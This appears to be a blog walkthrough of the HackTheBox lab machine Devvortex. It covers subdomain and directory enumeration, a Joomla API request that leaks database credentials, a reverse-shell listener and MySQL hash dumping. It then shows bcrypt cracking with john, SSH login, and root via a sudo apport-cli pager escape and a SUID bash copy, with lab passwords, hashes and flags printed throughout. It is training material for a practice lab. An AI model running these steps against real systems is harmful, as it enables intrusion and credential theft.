Home HackTheBox - Devvortex
Post
Cancel

HackTheBox - Devvortex

Posted Nov 28, 2023
By
9 min read

This box starts off with a website for a consultancy that offers different development services.

homepage

Reconnaissance

We find a subdomain called “dev.devvortex.htb”.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

$ gobuster vhost -u http://devvortex.htb -w ~/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://devvortex.htb
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /home/kali/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:      gobuster/3.5
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
2023/11/27 09:44:35 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.devvortex.htb Status: 200 [Size: 23221]
Progress: 4864 / 4990 (97.47%)
===============================================================
2023/11/27 09:44:48 Finished
===============================================================

Fuzzing different directories, we find a file called “README.txt”.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

$ gobuster dir -u dev.devvortex.htb -w ~/wordlists/SecLists/Discovery/Web-Content/raft-small-files.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dev.devvortex.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/kali/wordlists/SecLists/Discovery/Web-Content/raft-small-files.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/11/27 09:49:51 Starting gobuster in directory enumeration mode
===============================================================
/LICENSE.txt          (Status: 200) [Size: 18092]
/index.php            (Status: 200) [Size: 23221]
/.htaccess            (Status: 403) [Size: 162]
/robots.txt           (Status: 200) [Size: 764]
/.                    (Status: 200) [Size: 23221]
/.jpg                 (Status: 403) [Size: 162]
/.svn                 (Status: 403) [Size: 162]
/.gif                 (Status: 403) [Size: 162]
/.html                (Status: 403) [Size: 162]
/.cache               (Status: 403) [Size: 162]
/.smileys             (Status: 403) [Size: 162]
/.css                 (Status: 403) [Size: 162]
/.hcc.thumbs          (Status: 403) [Size: 162]
/configuration.php    (Status: 200) [Size: 0]
/.js                  (Status: 403) [Size: 162]
/.png                 (Status: 403) [Size: 162]
/.bmp                 (Status: 403) [Size: 162]
/.jpeg                (Status: 403) [Size: 162]
/.swf                 (Status: 403) [Size: 162]
/.pdf                 (Status: 403) [Size: 162]
/.ftpquota            (Status: 403) [Size: 162]
/README.txt           (Status: 200) [Size: 4942]
/.zip                 (Status: 403) [Size: 162]
Progress: 1346 / 11425 (11.78%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/11/27 09:50:11 Finished
===============================================================

The “README.txt” file mentions the version

readme

$ curl -v http://dev.devvortex.htb/api/index.php/v1/config/application?public=true

  • Trying 10.129.55.117:80…
  • Connected to dev.devvortex.htb (10.129.55.117) port 80 (#0)

    GET /api/index.php/v1/config/application?public=true HTTP/1.1 Host: dev.devvortex.htb User-Agent: curl/7.88.1 Accept: /

    < HTTP/1.1 200 OK < Server: nginx/1.18.0 (Ubuntu) < Date: Mon, 27 Nov 2023 08:42:38 GMT < Content-Type: application/vnd.api+json; charset=utf-8 < Transfer-Encoding: chunked < Connection: keep-alive < x-frame-options: SAMEORIGIN < referrer-policy: strict-origin-when-cross-origin < cross-origin-opener-policy: same-origin < X-Powered-By: JoomlaAPI/1.0 < Expires: Wed, 17 Aug 2005 00:00:00 GMT < Last-Modified: Mon, 27 Nov 2023 08:42:38 GMT < Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 < Pragma: no-cache < {“links”:{“self”:”http:\/\/dev.devvortex.htb\/api\/index.php\/v1\/config\/application?public=true”,”next”:”http:\/\/dev.devvortex.htb\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20”,”last”:”http:\/\/dev.devvortex.htb\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20”},”data”:[{“type”:”application”,”id”:”224”,”attributes”:{“offline”:false,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“offline_message”:”This site is down for maintenance.
    Please check back again soon.”,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“display_offline_message”:1,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“offline_image”:””,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“sitename”:”Development”,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“editor”:”tinymce”,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“captcha”:”0”,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”* Connection #0 to host dev.devvortex.htb left intact :{“list_limit”:20,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“access”:1,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“debug”:false,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“debug_lang”:false,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“debug_lang_const”:true,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“dbtype”:”mysqli”,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“host”:”localhost”,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“user”:”lewis”,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“password”:”P4ntherg0t1n5r3c0n##”,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“db”:”joomla”,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“dbprefix”:”sd4fg_”,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“dbencryption”:0,”id”:224}},{“type”:”application”,”id”:”224”,”attributes”:{“dbsslverifyservercert”:false,”id”:224}}],”meta”:{“total-pages”:4}}

$ curl -s http://dev.devvortex.htb/templates/cassiopeia/error.php/error.php

$ nc -lvnp 1234
listening on [any] 1234 … connect to [10.10.14.17] from (UNKNOWN) [10.129.55.117] 42342 bash: cannot set terminal process group (813): Inappropriate ioctl for device bash: no job control in this shell www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$ cd .. cd .. www-data@devvortex:~/dev.devvortex.htb/templates$ cd .. cd .. www-data@devvortex:~/dev.devvortex.htb$ ls -lah ls -lah total 120K drwxr-xr-x 17 www-data www-data 4.0K Sep 25 16:44 . drwxr-xr-x 4 root root 4.0K Oct 29 16:07 .. -rwxr-xr-x 1 www-data www-data 18K Dec 13 2022 LICENSE.txt -rwxr-xr-x 1 www-data www-data 4.9K Dec 13 2022 README.txt drwxr-xr-x 11 www-data www-data 4.0K Dec 13 2022 administrator drwxr-xr-x 5 www-data www-data 4.0K Dec 13 2022 api drwxr-xr-x 2 www-data www-data 4.0K Dec 13 2022 cache drwxr-xr-x 2 www-data www-data 4.0K Dec 13 2022 cli drwxr-xr-x 18 www-data www-data 4.0K Dec 13 2022 components -rw-r–r– 1 www-data www-data 2.0K Sep 25 16:44 configuration.php -rwxr-xr-x 1 www-data www-data 6.7K Dec 13 2022 htaccess.txt drwxr-xr-x 5 www-data www-data 4.0K Dec 13 2022 images drwxr-xr-x 2 www-data www-data 4.0K Dec 13 2022 includes -r-xr-x— 1 www-data www-data 1.1K Dec 13 2022 index.php drwxr-xr-x 4 www-data www-data 4.0K Dec 13 2022 language drwxr-xr-x 6 www-data www-data 4.0K Dec 13 2022 layouts drwxr-xr-x 6 www-data www-data 4.0K Dec 13 2022 libraries drwxr-xr-x 71 www-data www-data 4.0K Dec 13 2022 media drwxr-xr-x 26 www-data www-data 4.0K Dec 13 2022 modules drwxr-xr-x 25 www-data www-data 4.0K Dec 13 2022 plugins -rwxr-xr-x 1 www-data www-data 764 Dec 13 2022 robots.txt drwxr-xr-x 4 www-data www-data 4.0K Dec 13 2022 templates drwxr-xr-x 2 www-data www-data 4.0K Dec 13 2022 tmp -rwxr-xr-x 1 www-data www-data 3.0K Dec 13 2022 web.config.txt www-data@devvortex:~/dev.devvortex.htb$ cat configuration.php cat configuration.php <?php class JConfig { public $offline = false; public $offline_message = ‘This site is down for maintenance.
Please check back again soon.’; public $display_offline_message = 1; public $offline_image = ‘’; public $sitename = ‘Development’; public $editor = ‘tinymce’; public $captcha = ‘0’; public $list_limit = 20; public $access = 1; public $debug = false; public $debug_lang = false; public $debug_lang_const = true; public $dbtype = ‘mysqli’; public $host = ‘localhost’; public $user = ‘lewis’; public $password = ‘P4ntherg0t1n5r3c0n##’; public $db = ‘joomla’; public $dbprefix = ‘sd4fg_’; public $dbencryption = 0; public $dbsslverifyservercert = false; public $dbsslkey = ‘’; public $dbsslcert = ‘’; public $dbsslca = ‘’; public $dbsslcipher = ‘’; public $force_ssl = 0; public $live_site = ‘’; public $secret = ‘ZI7zLTbaGKliS9gq’; public $gzip = false; public $error_reporting = ‘default’; public $helpurl = ‘https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}’; public $offset = ‘UTC’; public $mailonline = true; public $mailer = ‘mail’; public $mailfrom = ‘lewis@devvortex.htb’; public $fromname = ‘Development’; public $sendmail = ‘/usr/sbin/sendmail’; public $smtpauth = false; public $smtpuser = ‘’; public $smtppass = ‘’; public $smtphost = ‘localhost’; public $smtpsecure = ‘none’; public $smtpport = 25; public $caching = 0; public $cache_handler = ‘file’; public $cachetime = 15; public $cache_platformprefix = false; public $MetaDesc = ‘’; public $MetaAuthor = true; public $MetaVersion = false; public $robots = ‘’; public $sef = true; public $sef_rewrite = false; public $sef_suffix = false; public $unicodeslugs = false; public $feed_limit = 10; public $feed_email = ‘none’; public $log_path = ‘/var/www/dev.devvortex.htb/administrator/logs’; public $tmp_path = ‘/var/www/dev.devvortex.htb/tmp’; public $lifetime = 15; public $session_handler = ‘database’; public $shared_session = false; public $session_metadata = true; }www-data@devvortex:~/dev.devvortex.htb$

www-data@devvortex:~/dev.devvortex.htb$ mysql -u lewis -p’P4ntherg0t1n5r3c0n##’ <vortex.htb$ mysql -u lewis -p’P4ntherg0t1n5r3c0n##’ mysql: [Warning] Using a password on the command line interface can be insecure. show databases; show tables; Database information_schema joomla performance_schema ERROR 1046 (3D000) at line 2: No database selected www-data@devvortex:~/dev.devvortex.htb$ mysql -u lewis -p’P4ntherg0t1n5r3c0n##’ -e “USE joomla; SHOW TABLES;” <P4ntherg0t1n5r3c0n##’ -e “USE joomla; SHOW TABLES;” mysql: [Warning] Using a password on the command line interface can be insecure. Tables_in_joomla sd4fg_action_log_config sd4fg_action_logs sd4fg_action_logs_extensions sd4fg_action_logs_users sd4fg_assets sd4fg_associations sd4fg_banner_clients sd4fg_banner_tracks sd4fg_banners sd4fg_categories sd4fg_contact_details sd4fg_content sd4fg_content_frontpage sd4fg_content_rating sd4fg_content_types sd4fg_contentitem_tag_map sd4fg_extensions sd4fg_fields sd4fg_fields_categories sd4fg_fields_groups sd4fg_fields_values sd4fg_finder_filters sd4fg_finder_links sd4fg_finder_links_terms sd4fg_finder_logging sd4fg_finder_taxonomy sd4fg_finder_taxonomy_map sd4fg_finder_terms sd4fg_finder_terms_common sd4fg_finder_tokens sd4fg_finder_tokens_aggregate sd4fg_finder_types sd4fg_history sd4fg_languages sd4fg_mail_templates sd4fg_menu sd4fg_menu_types sd4fg_messages sd4fg_messages_cfg sd4fg_modules sd4fg_modules_menu sd4fg_newsfeeds sd4fg_overrider sd4fg_postinstall_messages sd4fg_privacy_consents sd4fg_privacy_requests sd4fg_redirect_links sd4fg_scheduler_tasks sd4fg_schemas sd4fg_session sd4fg_tags sd4fg_template_overrides sd4fg_template_styles sd4fg_ucm_base sd4fg_ucm_content sd4fg_update_sites sd4fg_update_sites_extensions sd4fg_updates sd4fg_user_keys sd4fg_user_mfa sd4fg_user_notes sd4fg_user_profiles sd4fg_user_usergroup_map sd4fg_usergroups sd4fg_users sd4fg_viewlevels sd4fg_webauthn_credentials sd4fg_workflow_associations sd4fg_workflow_stages sd4fg_workflow_transitions sd4fg_workflows www-data@devvortex:~/dev.devvortex.htb$ mysql -u lewis -p’P4ntherg0t1n5r3c0n##’ -e “USE joomla; SELECT * FROM sd4fg_users;” <3c0n##’ -e “USE joomla; SELECT * FROM sd4fg_users;” mysql: [Warning] Using a password on the command line interface can be insecure. id name username email password block sendEmail registerDate lastvisitDateactivation params lastResetTime resetCount otpKey otep requireReset authProvider 649 lewis lewis lewis@devvortex.htb $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u 01 2023-09-25 16:44:24 2023-11-27 09:23:50 0 NULL 0 0 650 logan paul logan logan@devvortex.htb $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 0 0 2023-09-26 19:15:42 NULL {“admin_style”:””,”admin_language”:””,”language”:””,”editor”:””,”timezone”:””,”a11y_mono”:”0”,”a11y_contrast”:”0”,”a11y_highlight”:”0”,”a11y_font”:”0”} NULL 0 0 www-data@devvortex:~/dev.devvortex.htb$

┌──(kali㉿kali)-[~/ctf/htb/devvortex] └─$ cat hash.txt
logan:$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

┌──(kali㉿kali)-[~/ctf/htb/devvortex] └─$ john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 3 OpenMP threads Press ‘q’ or Ctrl-C to abort, almost any other key for status tequieromucho (logan)
1g 0:00:00:14 DONE (2023-11-27 10:31) 0.06930g/s 97.29p/s 97.29c/s 97.29C/s iceman..harry Use the “–show” option to display all of the cracked passwords reliably Session completed.

$ ssh logan@10.129.55.117 logan@devvortex:~$ cat user.txt 8debb75959308d8edf8909d7e44aeaba

logan@devvortex:~$ dpkg –list Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad) ||/ Name Version Architecture Description +++-=====================================-=================================-============-====================> ii accountsservice 0.6.55-0ubuntu12~20.04.6 amd64 query and manipulate> ii adduser 3.118ubuntu2 all add and remove users> ii alsa-topology-conf 1.2.2-1 all ALSA topology config> ii alsa-ucm-conf 1.2.2-1ubuntu0.13 all ALSA Use Case Manage> ii alsa-utils 1.2.2-1ubuntu2.1 amd64 Utilities for config> ii amd64-microcode 3.20191218.1ubuntu1.2 amd64 Processor microcode > ii apparmor 2.13.3-7ubuntu5.2 amd64 user-space parser ut> hi apport 2.20.11-0ubuntu27 all automatically genera> ii apport-symptoms 0.23 all symptom scripts for > ii apt 2.0.10 amd64 commandline package > ii apt-utils 2.0.10 amd64 package management r> ii at 3.1.23-1ubuntu1 amd64 Delayed job executio> ii auditd 1:2.8.5-2ubuntu6 amd64 User space tools for> ii base-files 11ubuntu5.7 amd64 Debian base system m> ii base-passwd 3.5.47 amd64 Debian base system m> ii bash 5.0-6ubuntu1.2 amd64 GNU Bourne Again SHe> ii bash-completion 1:2.10-1ubuntu1 all programmable complet> ii bc 1.07.1-2build1 amd64 GNU bc arbitrary pre> ii bcache-tools 1.0.8-3ubuntu0.1 amd64 bcache userspace too> ii bind9-dnsutils 1:9.16.1-0ubuntu2.16 amd64 Clients provided wit> ii bind9-host 1:9.16.1-0ubuntu2.16 amd64 DNS Lookup Utility ii bind9-libs:amd64 1:9.16.1-0ubuntu2.16 amd64 Shared Libraries use> ii binutils 2.34-6ubuntu1.6 amd64 GNU assembler, linke> ii binutils-common:amd64 2.34-6ubuntu1.6 amd64 Common files for the> ii binutils-x86-64-linux-gnu 2.34-6ubuntu1.6 amd64 GNU binary utilities> ii bolt 0.9.1-2~ubuntu20.04.2 amd64 system daemon to man> Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend logan@devvortex:~$ sudo apport-cli -f –package=adduser –save=/var/crash/adduser.crash

*** Collecting problem information

The collected information can be sent to the developers to improve the application. This might take a few minutes. ……………….. logan@devvortex:~$ sudo /usr/bin/apport-cli -c /var/crash/adduser.crash

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the automatically opened web browser.

What would you like to do? Your options are: S: Send report (3.0 KB) V: View report K: Keep report file for sending later or copying to somewhere else I: Cancel and ignore future crashes of this program version C: Cancel Please choose (S/V/K/I/C): v !sh

id

uid=0(root) gid=0(root) groups=0(root)

cat /root/root.txt

509cf3d203fbce02c527dd479054d6a6

alternative: $ sudo apport-cli -c /var/crash/test.crash

v !cp /bin/bash /tmp/b v !chmod +s /tmp/b $ /tmp/b -p

htb, machine
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents